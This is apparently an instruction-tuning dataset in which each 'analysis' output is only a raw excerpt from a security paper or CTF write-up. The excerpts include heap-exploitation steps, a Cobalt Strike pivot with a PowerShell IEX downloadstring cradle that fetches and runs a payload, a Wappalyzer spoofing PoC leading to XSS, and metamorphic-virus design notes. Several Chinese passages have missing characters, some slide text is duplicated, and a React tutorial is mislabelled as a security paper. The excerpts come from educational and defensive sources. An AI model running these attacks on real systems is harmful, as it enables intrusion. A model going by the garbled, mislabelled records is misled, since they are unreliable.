{ unsigned int v0; // [rsp+Ch] [rbp-4h]@1 printf(\"\\nEnter index :\"); __isoc99_scanf(\"%d\", &v0); if ( v0 <= 0x13 ) free(heap_ptrs[(unsigned __int64)v0]); } ``` ### 第一步 首先伪造一个 chunk chunk的大小为0x61紧接着我们利用 partial overwrite 将 FD 指向伪造的chunk当然这里我们也可以用 UAF 完成 伪造 chunk size ```bash pwndbg> 0x555555757050: 0x41414141 0x41414141 0x41414141 0x41414141 0x555555757060: 0x41414141 0x41414141 0x41414141 0x41414141 0x555555757070: 0x41414141 0x41414141 0x41414141 0x41414141 0x555555757080: 0x41414141 0x41414141 0x41414141 0x41414141 0x555555757090: 0x41414141 0x41414141 0x61 0x0 <---------- ``` 这里我们 free 掉 chunk 1这个时候我们能获得一个 unsortbin ``` 0x555555757020 PREV_INUSE { prev_size = 0x0, size = 0xd1, fd = 0x7ffff7dd1b58 <main_arena+88>, bk = 0x7ffff7dd1b58 <main_arena+88>, fd_nextsize = 0x4141414141414141, bk_nextsize = 0x4141414141414141 } ``` 接着我们重分配 0xd1 这块 chunk以及修改其 size 为0x71 ``` pwndbg> x/40ag 0x555555757020 0x555555757020: 0x4141414141414141 0x71 0x555555757030: 0x7ffff7dd1b58 <main_arena+88> 0x7ffff7dd1b58 <main_arena+88> 0x555555757040: 0x4141414141414141 0x4141414141414141 0x555555757050: 0x4141414141414141 0x4141414141414141 0x555555757060: 0x414141414141414", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### Integer Overflow and Underflow原理 EVM的整数有 `int` 和 `uint` 两种对应有无符号的情况在 `int` 或 `uint` 后可以跟随一个8的倍数表示该整数的位数如8位的 `uint8`位数上限为256位`int` 和 `uint` 分别是 `int256` 和 `uint256` 的别名一般 `uint` 使用的更多 在整数超出位数的上限或下限时就会静默地进行取模操作通常我们希望费用向上溢出变小或者存款向下溢出变大整数溢出漏洞可以使用 SafeMath 库来防御当发生溢出时会回滚交易", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMetamorphic Viruses Sean OToole Metamorphism Defined  Body-polymorphics (Szor, 127)  Self Mutating Code (Lord Julius)  The Art of Extreme Mutation (Mental Drill) Brief Description of Sections  1) Disassembler: used to disassemble host, most often into a linked list of op codes.  2) Depermutater: removes some of the jumps added by the permutater, and sometime also from the host, and therefore removes unreachable code.  3) Shrinker: changes op code clusters to most efficient op code. Brief Description of Sections  4) Expander: randomly chooses code to change to equivalent op code or op code cluster.  5) Permutater: randomly shuffles groups of code and links the groups with JMPs.  6) Assembler: re-assembles code at the end of the infection process. Metamorphic Programming Approach Do not think in code think in macros (Mental Drill). In other words, the best approach to this process it to approach it with software engineering in mind. Everything is a separate/independent module or macro. 1) Disassembler (Choices)  Using a pseudo-language, which was the idea presented in Metamorphism in Practice by Mental Drill.  Using a reverse-engineering tool, such as LDE (Length Disassembly Engine) and ADE (Advanced Disassembly Engine) by Zombie. To use these please check the manuals that accompany the module. 1.1) Pseudo Code Ex. by Mental Drill Op Code Structure: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 OP *-------- instruction data -------* LM *-pointer-* Op Coding Ex. (Full List in Article): MOV:= 40; Reg, Mem:= +2; So, MOV Reg, Mem := 42 2) Depermutator (Choices)  Integrate depermutator into the disassembly process. (This is the most common.)  Create separate module for depermutator. 2.1) Pseudo-Code Variables: ESI = Entrypoint. PathMarks: buffer that will contain the depermutated virus. LabelTable: list of elements that are each two DWORDs long. The first DWORD stores the real EIP where it points; the second stores a pointer to the depermutated code. FutureLableTable: li", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Blasting Event-Driven Cornucopia: WMI-based User-Space Attacks Blind SIEMs and EDRs Claudiu Teodorescu Andrey Golchikov Igor Korkin #BHUSA @BlackHatEvents Information Classification: General The Binarly Team  Claudiu to the rescue Teodorescu  @cteo13  Digital Forensics, Reverse Engineering, Malware & Program Analysis  Instructor of Special Topics of Malware Analysis Course on BlackHat USA  Speaker at DEF CON, BSidesLV, DerbyCon, ReCon, BlackHat, author of WMIParser  Andrey red plait Golchikov  @real_redp  More than 20 years in researching operating system security and reversing Windows Internals  Speaker at BlackHat, author of WMICheck  redplait.blogspot.com  Igor Korkin  @IgorKorkin  PhD, Windows Kernel Researcher  Speaker at CDFSL, BlackHat, HITB, SADFE, Texas Cyber Summit, author of MemoryRanger  igorkorkin.blogspot.com #BHUSA @BlackHatEvents Information Classification: General Agenda  Windows Management Instrumentation (WMI)  Architecture and features  Abusing WMI by attackers: MITRE ATT&CK and malware samples  Applying WMI for defenders: academic and practical results  Attacks on WMI blind the whole class of EDR solutions  Overview of existing attacks on WMI  Attacks on user- and kernel- space components  WMICheck detects attacks on WMI  WMI sandboxing attack  MemoryRanger prevents the WMI sandboxing #BHUSA @BlackHatEvents Information Classification: General Windows Management Instrumentation (WMI) Architecture #BHUSA @BlackHatEvents Information Classification: General WMI provider is a user-mode COM DLL or kernel driver Enumerates WMI providers, the DLLs that back the provider, and the classes hosted by the provider by Matt Graeber Windows 11 includes over 4000 built-in WMI providers:  BIOS\\UEFI  OS and Win32  WMI, ETW  Disks and Files  Registry  Network and VPN  Encryption  Security Assessment  Hyper-V  Microsoft Defender:  Antimalware  DeviceGuard  Hardware:  Multimedia (sound, graphics)  TPM  Power and Temp Management netnccim.mof #BH", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCobalt Strike trick 3 - PivotReverse TCP 当在内需要建起控制链时如多层路由下层路由机器法出时常常会使Beacon Session作为跳板来做转发 常的控制式有两种Bind TCP和Bind SMB这两种都需要标机器对应端开放但 如果标开启了强度较的防墙或者硬件防墙有策略时可能会法访问到标的对 应端此时可以尝试下Reverse TCP 在已有Session选择Pivoting->Listener 即可在跳板机上建个监听器本质上其实是动做的端转发同样只能使Stageless 类型的Artifact可以创建个Web Deliver便投放 随后动设置下端转发让跳板机端的流量转发到Teamserver上 将Web deliver语句修改成跳板机对应的地址 powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://172.16.38.8:8023/a'))\" 执后成功上线 反向连接的拓扑", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents IAM The One Who Knocks Igal Gofman, Noam Dahan #BHUSA @BlackHatEvents Information Classification: General Igal Gofman @IgalGofman  Head of Research, Ermetic  Microsoft MSTIC  Microsoft security research  Active Directory expert Noam Dahan @NoamDahan  Cloud security researcher  Love/hate relationship with embedded devices  Offensive background Whoami #BHUSA @BlackHatEvents Information Classification: General Why are we here? Background #BHUSA @BlackHatEvents Information Classification: General IAM best practices  GCP - Basic roles include thousands of permissions across all Google Cloud services. In production environments, do not grant basic roles unless there is no alternative. Instead, grant the most limited predefined roles or custom roles that meet your needs.  GCP - Treat each component of your application as a separate trust boundary.  GCP - Grant roles at the smallest scope needed. https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html https://cloud.google.com/iam/docs/using-iam-securely https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices  AWS - Apply least-privilege permissions  AWS - Use IAM Access Analyzer to generate least-privilege policies based on access activity  AWS - Regularly review and remove unused users, roles, permissions, policies, and credentials  AWS - Use conditions in IAM policies to further restrict access  Azure - Treat identity as the primary security perimeter  Azure - Use role-based access control  Azure - Lower exposure of privileged accounts #BHUSA @BlackHatEvents Information Classification: General Agenda  IAM Crash Course  Cloud IAM weak spots (permissions landscape)  Things are not always what they seem  Defense & Monitoring techniques  Demo Agenda #BHUSA @BlackHatEvents IAM Crash Course #BHUSA @BlackHatEvents Information Classification: General Security Context  Users  Roles  Services account  Managed Identity  Service principal IAM Crash Course: IA", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ndata = [0x7a, 0xe5, 0x85, 0x02, 0x22, 0xb8, 0x2d, 0x4f, 0x3d, 0x29, 0x00, 0xf9, 0x13, 0x37, 0xaf, 0x79, 0x10, 0x2e, 0x27, 0x16, 0x6e, 0x3e, 0x27, 0x6d, 0x0d, 0xab, 0x72, 0x58, 0x2c, 0x42, 0x95, 0x2c, 0x72, 0xd3, 0x88, 0x9b, 0x11, 0x0d, 0xe1, 0xf0, 0x58, 0xa0, 0x98, 0xd1, 0x79, 0x23, 0x05, 0x35, 0x37, 0xd0, 0x46, 0x71, 0x09, 0x65, 0xaf, 0x85, 0x13, 0x91, 0x95, 0xa6, 0x2b, 0x73, 0x35, 0x62] print len(data) seed = 0xa5a5a5a5 for i in range(16): seed *= 0x41c64e6d seed += 0x3039 seed &= 0x7fffFFFF const = data[i*4:i*4+4] c = 0 for j in const: c <<= 8 c |= j val = c  seed val = (val & 0x7f) - 3 print chr(val)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTesla released the P85D in 2014. At that time the vehicle came with \"insane mode\" acceleration with a 0-60 time of 3.2 seconds. Later in July of 2015, Tesla announced \"Ludicrous mode\" that cut the 0-60 time down to 2.8 seconds. This upgrade was offered both new and as a hardware and firmware change to the existing fleet of P85D vehicles. Since then, Tesla has released newer ludicrous vehicles. What makes the P85D upgrade unique was how the process required changes to the vehicle's Battery Management System(BMS). The BMS handles power requests from the drive units and other components of the car. This paper will outline the ludicrous upgrade process through reverse engineering CAN bus messages, CAN bus UDS routines and various firmware files contained on the car. This process also involved extracting Python source code used for diagnostics to determine that the ludicrous upgrade process involved replacing the contactors and fuse with higher current versions as well as modifying the current sensing high voltage \"shunt\" inside the battery pack. The process was performed on an actual donor P85D. During the upgrade attempt, the car was bricked, forcing it to be towed to another state for troubleshooting. The cause of the failure was a file contained on the security gateway that had to be modified manually in order to update the gateway with the newer configuration of the vehicles battery pack. This paper will outline the structure of that file and how it was successfully modified. Vehicle Overview The Model S powertrain network consists of a standard vehicle CAN bus network running at 500 Kbit/sec. The modules on this network support standard UDS commands, this standard was critical in performing this upgrade process. This CAN bus network as well as several of the other networks all connected to the Security gateway contained within the Central Information Display. This security gateway acts as a vehicular firewall, blocking some CAN bus messages while bridging others on", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHITCON GIRLS 成果分享 與 BLACK HAT 之旅 HITCON COMMUNITY 2019 SPEAKERS shad0w  台灣停電科技大學研究生HITCONGIRLS創始團隊中最晚脫離學生身份的人(ω)ノ akee  HITCONGIRLS成員,不是創始團隊也沒有兼職只是個單純的成員_(:з)_ HazelYen  HITCONGIRLS創始團隊暨總召比較擅長活在鍵盤後面的生物(ﾟﾟ) OUTLINE HITCONGIRLS介紹 近期成果與專案 BlackHat旅程 DEFCON見聞 OUTLINE HITCONGIRLS介紹 近期成果與專案 BlackHat旅程 DEFCON見聞 HITCON GIRLS 介紹 HITCONGIRLS是以女性為主的資安社群 我們組織各種不同主題的讀書會來幫助成 員們透過合作與分享來克服學習上的瓶頸與 互相學習創造一個鼓勵並激發女性學習資 安的環境並增加科技產業的包容性 HITCON GIRLS 理念 希望聚集對資安感興趣一起成長的女性推 廣任何人都可以學習資訊安全的理理念念 組織架構 籌備團 讀書會 組織架構 籌備團 讀書會 負責活動和場地財務管理理和實作 群溝通完善原本的規劃促成順暢 的活動流程籌備團也是HITCON GIRLS 創立的前身 (ง๑ _)ง 籌備團 每年年都會辦一場大型的活動 資安推廣活動 粉絲團twitter官網... 組織架構 籌備團 讀書會 負責活動和場地財務管理理和實作 群溝通完善原本的規劃促成順暢 的活動流程籌備團也是HITCON GIRLS 創立的雛形 每個週期會有不定數量量的讀書會小 組平時獨立運作舉辦組內讀書會 每個月會有全體交流會讓大家攝取 不同類型的知識 d(`)b DFIR 組 數位鑑識與響應分析組負責 蒐集資料分析駭客到底在犯 案現場留留下了了什什麼 以 CTF 為目標的組別包山包 海海什什麼都研究還會不定期出團 打 CTF 惡惡意程式分析組 針對 Malware 進行行分析研 究內容包含靜態與動態分 析各種工具以及分析思 路路 不分組 對於各個領域的資安研究都 會進行行涉獵和分享 CTF 組 WEB PT 組 專門研究網頁滲透測試的手 法如何攻擊如何防禦都是 研究目標 讀書會 OUTLINE HITCONGIRLS介紹 近期成果與專案 BlackHat旅程 DEFCON見聞 近期成果與專案 - 之於一個社群 點數制度 總召選舉&行政團隊 教練制度 英文官網 點數規則的由來 社群來自於一群擁有共同理念的夥伴在對資訊安全有興趣 的匯合下我們組成HITCONGIRLS 健康的社群需要傳承與制度 讀書會的經營活動的籌劃以及組織的營運需要夥伴一起分擔點數 是為了鼓勵不斷在付出的人不論你做的事情是大是小 點數可以換什麼 不一定有有就會回饋社群 總召選舉&行政團隊 健康的社群需要傳承與制度 讓每個人找到自己的舞台或許有成員非資安 相關但是她支持社群的理念她也可以幫忙 總召怎麼選 由非總召的成員成立選舉活動 徵總召候選人發表未來營運方針目標 所有成員皆可投票 為什什麼社群要搞得這麼複雜 搞得好像社群感情很不好 行政團隊 拆分工作的目標是降低每個人的壓力 環環相扣的行政流程代表每個人都很重要 永遠找得到事情做沒有的話還可以自己新 增XD 所以到底為什麼要弄得這麼複雜 為了讓社群永存  避免單一人力過勞  傳承後有完整的文件營運制度可以參考  規範代表限制同時也代表保障 為了讓成員有參與感發言權 有一天總召不在了任何人都可以當上領導者 教練制度 HG有一個特別的存在叫作教練 於讀書會有問題時可向他/她提問 教練制度的苦衷TT 這就是最容易被說女生真好的制度 其實呢Mentor作法在資安圈很常見 其實呢教練沒有義務要幫我們回應每個問題 其實呢就跟在研討會抓住Speaker發問一樣 曾經有人問過粉絲團如何自主學習 教練在這 但學習還 是靠自己 ENGLISH WEBSITE ENGLISH WEBSITE 自從上了英文官網後來自國外的訊息互 動活動就變多了呢推薦XD 感謝成員幫忙翻譯 近期成果與專案 - 活動回顧 不是刻意但HG活動大概有三種類型  大型活動開放的很累的  分享把知識轉成語言投影片或影片的類型  邀請型會請外部的人來分享經驗 活動回顧大型活動 2014 第四屆讀書會成員招募CTF HITCONCMT2018 我們的初始Workshop HGatHITB活動 2019 2018 活動回顧分享 讀書會成果發表 資安萌芽推廣 HG帶你直擊Conf 2015 2017 2019 活動回顧邀請型 2015 2016 2017 BirdsofaFeather 資安女性分享會 ChipchatParty 週年紀念以及PPP分享 2019 OUTLI", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 面试问题 --- ## 自由发挥的那种 - 打过几次护网 - 护网里面怎么做信息收集 - 怎么绕 cdn - 遇到的常见的 web 漏洞有哪些 - 描述一下你印象最深的渗透案例 - 你平时端口扫描的所使用的工具有哪些为什么选择这个工具有对比过速度吗 - 掌握哪些编程语言会不会用 python 写 poc 或 exp, 写过哪些 poc? - 只给你一个单位名称如何进行信息收集 - 最近关注哪些漏洞,比如 spring4shell,log4j 这些你有跟踪吗? - 怎么接触到安全行业的 - 你目前的工作情况是怎么样的? 评价下自己的同事水平? - 平时挖 src 吗? 讲一讲印象比较深刻的案例? - 如果目标是政府单位,如何进行信息收集 - 小程序公众号的渗透做过吗简单讲讲 - 对于红队的基础设施搭建你平常是怎么做的 - 自己有博客或者开源项目吗 ## 涉及具体知识的的那种 ### 漏洞利用 - 讲一讲 mysql 提权的几种方式 - 讲一讲 redis 提权的几种方式 - 讲一讲 linux 提权的几种方式 - 文件上传的绕waf方式 - 讲一讲中间件解析漏洞 - 讲讲docker逃逸的几种方式 - k8s安全这块有经验吗简单讲讲 ### 内网安全 - 内网渗透经验有没有工作组还是域 - 域中怎么定位域控 - 域中怎么定位域管理员如果 net group 命令查不出来域管理员是为什么 - 有哪些方式拿下域控 - 工作组渗透有哪些手段 - 简单讲讲 zerologon 的原理 - 金票和银票的区别 - 金票的利用条件 ### java 安全 - 有没有做过 java 代码审计的项目 - log4j rce 的原理了不了解讲一讲 - shiro 反序列化怎么绕 waf - shiro payload 过长怎么办 - fastjson 怎么绕 waf - 内存马有了解过吗? 具体的利用? ### SSRF - 说一个容易出现 SSRF 漏洞的场景 - 如果过滤了以 http 开头的协议怎么绕过 - ssrf 绕过过滤的思路 - 利用 DNS 重绑定来绕过 SSRF 的原理 - TLS Poison 有没有了解过 - java 应用的 ssrf 点默认能不能利用 DNS-Rebinding ,为什么? ### SQL 注入 - sqlmap 的用法或者你自己使用时的一些技巧 - sqlmap tamper 有没有使用过或编写过, 讲一讲 - mssql 怎么执行命令, 如果 xp_cmdshell 被禁用了怎么办 - mssql 除了 xp_cmdshell 还有哪些方法可以执行命令 - mysql 注入的绕 waf 方式", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEF CON 101 FIRST  A BRIEF MOMENT OF SILENCE DevNull KingTuna WELCOME TO DEF CON HighWiz @highwiz Will @bsummerz Niki7a @Niki7a Magen Wu @magen_wu SecBarbie @SecBarbie Shaggy @ShaggyMcG n00bz @n00bznet MEET THE PANEL WELCOME TO LAS VEGAS Pace Yourself THIS IS DEF CON DGAF Everyone was a n00b once. All of us are still n00bs at something. THE COUNTDOWN Simple rules for surviving DEF CON Wash your hands, too Three Hours Daily Two meals daily Once Per Day THIS IS THE DESERT Stay hydrated All Good Sit Down And Drink Water Grab A Glass of Water Call A Doctor THE DEF CON CRUD Fist your friends Fist them often Seriously, wash your damn hands THIS IS DICK DONT. BE. A. DICK. THE BASICS Hold the door. Keep your head up. Pay attention. Dont block the hallway. DONT BA AN ASSHAT Dont ruin everyones time DONT HECKLE If you dont agree, talk afterwards. See the previous slide. PHONES AND WIRELESS Seriously? This is a hacker convention. Use your head. ASK PERMISSION Personal Space PICTURES Be Polite  Ask first Still, expect to be in a picture or two. Ask nicely if you dont want to be in one. NOT EVERYTHING IS FREE Just because you see it laying out, does not mean you can take it. HAVE A PLAN Read the program. HACKER TRACKER! Talks fill up quickly. Consider purchasing the videos from TSOK. HACKER TRACKER  The official schedule app for DEF CON  Lots of good info about DC27  Available on the App Store and Google Play  You should have downloaded it before now THE TALKS VILLAGES AI Village AppSec Village Aviation Village BCOS Block Chain Village Bio Hacking Village Blue Team Village Car Hacking Village Cloud Village Crypto & Privacy Village Data Duplication Village Hardware Hacking Village DroneWarz Village Ethics Village Hack the Sea Village Ham Village ICS Village Internet of Things Village Lock Bypass Village Lock Pick Village Monero Village Packet Hacking Village r00tz Asylum Recon Village Red Team Offense Village Rogues Village Social Engineering Village SkyTalks 303 Soldering Skills", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThruGlassXfer ThruGlassXfer Remote Access, the APT Remote Access, the APT Credit: Awesome graphics from WallpapersWide.com August 2015 Remote Access, the APT // Ian Latter 2 Key messages for this session Key messages for this session  Current security architecture, flawed (now) Current security architecture, flawed (now)  Published everything you need to know Published everything you need to know  From first principles, to demonstrations and full From first principles, to demonstrations and full code release (PoC) with test framework. code release (PoC) with test framework.  The impact will probably be significant The impact will probably be significant  No constraints to data theft for remote workers or No constraints to data theft for remote workers or off-shore partners off-shore partners  There are no easy answers There are no easy answers  The paper has some suggestions The paper has some suggestions August 2015 Remote Access, the APT // Ian Latter 3 Who is this guy, at work? Who is this guy, at work?  Career Career  Blue, create & fix Blue, create & fix  Governance (Technical, Security) Governance (Technical, Security)  Multiple iconic international enterprise organisations Multiple iconic international enterprise organisations  Architect / Designer Architect / Designer  Enterprise perimeters, Data Centre consolidation Enterprise perimeters, Data Centre consolidation  SysAdmin, Tech Support SysAdmin, Tech Support  Red, break & destroy Red, break & destroy  Ethical Hacker / Penetration Tester Ethical Hacker / Penetration Tester  Pwnd asia pacific in a business day Pwnd asia pacific in a business day August 2015 Remote Access, the APT // Ian Latter 4 Who is this guy, at home? Who is this guy, at home?  My time My time  Threat Intelligence Threat Intelligence  Practical Threat Intelligence course, BH Practical Threat Intelligence course, BH  Threat Analytics cloud service Threat Analytics cloud service  OSSTMM OSSTMM  Active Filter Detection tool Active Filter De", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAyoub ELAASSAL ayoub.elaassal@wavestone.com @ayoul3__ CICS BREAKDOWN Hack your way to transaction city  WAVESTONE 2 What people think of when I talk about mainframes  WAVESTONE 3 The reality: IBM zEC 13 technical specs:  10 TB of RAM  141 processors,5 GHz  Dedicated processors for JAVA, XML and UNIX  Cryptographic chips Badass Badass Badass !! So whatwho uses those anymore ?  WAVESTONE 4 APIS IT - Atos Origin - Applabs - Arbys  Wendys Group - Archer Daniels Midland - Assurant - AT&T / BellSouth / Cingular - Atlanta Housing Authority - Atlanta Journal Constitution - Atlantic Pacific Tea Company (A&P) - Aurum/BSPR - Auto Zone - Aviva - Avnet - Avon (Westchester) - Axa (Jersey City) - ANZ Bank - BI Moyle Associates, Inc. - Bajaj Allianz - Bank Central Asia (BCA) - Bank Indonesia (BI) - Bank International Indonesia (BII) - Bank Nasional Indonesia (BNI46) - Bank Of America - Bank of America (BAC) - Bank of America (was Nations Bank  Can work out of Alpharetta office) - Bank of Montreal (BMO:CN) - Bank of New York Mellon (BNY) (BK) New York NY, Pittsburgh, PA and Nashville, TN, Everett - Bank of Tokyo (Jersey City) - Bank Rakyat Indonesia (BRI) - Bank Vontobel - BB&T - Belastingdienst - Bi-Lo - Blue Cross Blue Shield - Blue Cross Blue Shield GA - Blue Cross Blue Shield MD - Blue Cross Blue Shield SC - Blue Cross Blue Shield TN - Blue Cross/Blue Shield of Texas - Brindley Technologies - BMC Software - BMW - BNP Paribas Fortis Brussels Belgium - BNP Paribas Paris France - Boston Univerity - Broadridge Financial Services - Brotherhood Bank & Trust - Broward County Schools - Brown Brothers Harriman (BBH) - British Airways - C&S Wholesale Grocers - CA Technologies - California Casualty Management Company, San Mateo and Sacramento, CA - Canadian Imperial Bank of Commerce (CIBC) - CAP GEMINI - Capco - Capital One - Glen Allen/West Creek - Catapiller - Cathy Pacific - CDSI - Ceridian - CGI - Charles Schwab - Chase - Chemical Abstract Services (CAS) - Choice Point - Chrysler - Chu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Number Error Misc. ## Description: > The function `assert_number(num: number)` is merely a debug function for our Wee VM (WeeEm?). It proves additions always work. Just imagine the things that could go wrong if it wouldn't! ## Solution: This is a \"Wee\" challenge - see basic explanation [here](./Wee/). The `assert_number` logic is as follows: ```typescript externals.addFunction( \"assert_number\", [{name: \"num\", type: compiler.NumberType}], compiler.StringType, false, (num: number) => !isFinite(num) || isNaN(num) || num !== num + 1 ? \"NUMBERS WORK\" : flags.NUMBER_ERROR ) ``` I once had to work on a project which constantly required setting and clearing bits on a UINT32. I didn't like the calculator GUI so I wrote a [tiny Javascript utility](https://github.com/Dvd848/Online_Tools/blob/master/Bit_Parser.html) to help me. It worked well for 32 bits, but when trying the same logic on 64 bit integers, things started to break. That's where I learnt that Javascript has a [Number.MAX_SAFE_INTEGER](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Number/MAX_SAFE_INTEGER) definition: > The MAX_SAFE_INTEGER constant has a value of 9007199254740991 (9,007,199,254,740,991 or ~9 quadrillion). The reasoning behind that number is that JavaScript uses double-precision floating-point format numbers as specified in IEEE 754 and can only safely represent numbers between -(253 - 1) and 253 - 1. > > Safe in this context refers to the ability to represent integers exactly and to correctly compare them. For example, Number.MAX_SAFE_INTEGER + 1 === Number.MAX_SAFE_INTEGER + 2 will evaluate to true, which is mathematically incorrect. See Number.isSafeInteger() for more information. So, to hit the assertion, we need to use: ```python import requests r = requests.post('http://35.207.189.79/wee/run', json={\"code\": \"alert(assert_number(9007199254740991 + 1))\"}) print(r.text) ``` The output: ```console {\"code\":\"alert(assert_number(9007199254740991 + 1))\",\"result\":\"3", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n你怎么知道Wappalyzer是不是在骗你 Wappalyzer插件检测原理 插件是开源的 https://github.com/wappalyzer/wappalyzer readme中提到会收集cookiedomjscssheader等数据通过既定规则匹配实现获取信息并匹 配版本 其中js和dom比较特别这里以js为例分析 https://github.com/wappalyzer/wappalyzer/blob/v6.10.18/src/drivers/webextension/js/content.js #L36-L42 会插入一个 js/js.js 到前端去执行 https://github.com/wappalyzer/wappalyzer/blob/v6.10.18/src/drivers/webextension/js/js.js 代码比较长简化代码逻辑如下 可以看到这个js会启动监听message插件后台会将指纹规则postMessage的方式传到前端又前端 进行指纹匹配将结果用postMessage传回后台 function getJs(technologies) { return inject('js/js.js', 'js', { technologies: technologies .filter(({ js }) => Object.keys(js).length) .map(({ name, js }) => ({ name, chains: Object.keys(js) })), }) } /* eslint-env browser */ ;(function () { try { const onMessage = ({ data }) => { 检查data是否是指纹规则 removeEventListener('message', onMessage) postMessage({ wappalyzer: { js: 执行指纹规则的结果 }, }) } addEventListener('message', onMessage) } catch (e) { // Fail quietly } })() 伪造指纹 那么我们也可以手动postMessage一些数据去伪造指纹匹配结果 由于wappalyzer收到规则后会删除监听可以hook removeEventListener 函数在调用时就可以手 动postMessage伪造指纹 // hook removeEventListener let rel = removeEventListener; removeEventListener = (name, func, opt) => { if ( name === \"message\" && func && func.toString().includes(\"wappalyzer.technologies\") !== -1 && func.toString().includes(\"removeEventListener\") !== -1 && func.toString().includes(\"__UNDEFINED__\") !== -1 && func.toString().includes(\"postMessage\") !== -1 ) { poc(); rel(name, func, opt); } else { rel(name, func, opt); } }; const poc = () => { postMessage({ wappalyzer: { js: [ { name: \"jQuery\", chain: \"$.fn.jquery\", value: \"99.99.99\", }, ], }, }); }; 同样的道理把指纹库里的全部post过去就有全部指纹了 XSS 仔细观察执行js指纹规则的代码 technologies.reduce((technologies, { name, chains }) => { chains.forEach((chain, index) => { const value = chain .split('.') .reduce( (value, method) => value && value instanceof Object && Object.prototype.hasOwnProperty.call(value, method) ? value[method] : '__UNDEFINED__', window ) if (value !== '__UNDEFINED__') { technologies.push({ name, c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Full compromise, RE, 250pts > An attacker managed to hack our CI server and sign+encrypt his malicious code in a ECU firmware, that is now running in millions of cars and doing Chaos knows what. To stop the attackers, we must know what the malicious code is doing. We have a history of all binaries signed by the server on the day of the hack, and a device running the attacker's firmware. Help us find which sample was provided by the attacker and get access to its management interface. In this task, we got 1000 samples of unencrypted binaries, and one encrypted to be flashed on the chip. We did not know which one of these 1000 is the correct one. After reversing their code, we noticed that the password check takes very long time (hours), so we cannot just brute force our way and check all 1000 passwords. Instead, we noticed there's a debug mode in the program, which outputs some analog data to chip's DAC. Each of the 1000 samples has somewhat different pattern. We dumped the pattern from our chip using logic analyzer, and simulated each of the 1000 known ones using `simavr`. One of them matched ours. Typing its password to the chip's UART, we got the flag.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## 组件的组合嵌套和组件树 ### 组建的创建 第一种组件的创建方式 **function** ``` import React from 'react' import ReactDom from 'react-dom' function Hello(){ return ( <div> <h1>我是第一种组件的创建方式</h1> </div> ) } ReactDom.render(<Hello />,document.querySelector('#root')) ``` **注意** 1. 自定义的组件都必须要用大写字母开头普通的 HTML 标签都用小写字母开头 2. 必须有返回值,而且返回值必须是JSX elements 第二种组件的创建方式 **ES6类** ``` import React from 'react' class App extends React.Component{ render(){ return ( <div> App </div> ) } } export default App ``` 组件内参数的传递 ``` import React from 'react' import ReactDom from 'react-dom' function Word(props){ return ( <p>My name is {props.name}</p> ) } function Hello(){ return ( <div> <Word name='Liu' /> </div> ) } ReactDom.render(<Word />,document.querySelector('#root')) ``` ### 导入CSS ``` //插入css外部样式 import './App.css' //行内样式 <h1 style={}>我是H1</h1> //行内样式的时候样式写成对象的模式对象是js语言所以用大括号包裹 //1.{ backgroundColor:'teal', fontSize:'20px' } //2.写成一个方法返回一个对象 //3.声明一个对象 //4.只要样式写为对象的方式 styles(){ return({ box:{ background:'green' }; }) } <h1 style={this.styles.box}>我是H1</h1> let styles={ h1:{ color:'#CCC', backgroundColor:'teal' }, div:{ width:'100vw', height:'200px' } } <h1 style={styles.h1}>我也是H1</h1> ``` ### 导入图片 当作变量导入 ``` //先导入 import img from './xxx.jpg' //引用本地 \"<img src={img} alt='' />\" //网上图片直接引用 \"<img src='[地址]' alt='' />\" ``` ### 组件的嵌套 子组件 ``` import React from 'react' import Header from './Header' import Main from './Main' import Footer from './Footer' class App extends React.Component{ render(){ return( <div className='App'> <Header /> <Main /> <Footer /> </div> ) } } export default App ``` 父组件 ``` import React from 'react' import ReactDom from 'react-dom' import App from './App' ReactDom.render(<App />,document.querySelector('#root')) ``` ### 组件树 ``` import React from 'react'; import ReactDOM from 'react-dom'; class Title extends React.Component { render(){ return ( <h1>React</h1> ) } } class Header extends Component { render () { return ( <div> <Title /> <h2>This is Header</h2> </div> ) } } class Main extends Component", "category": "text_analysis", "source": "security_papers"}
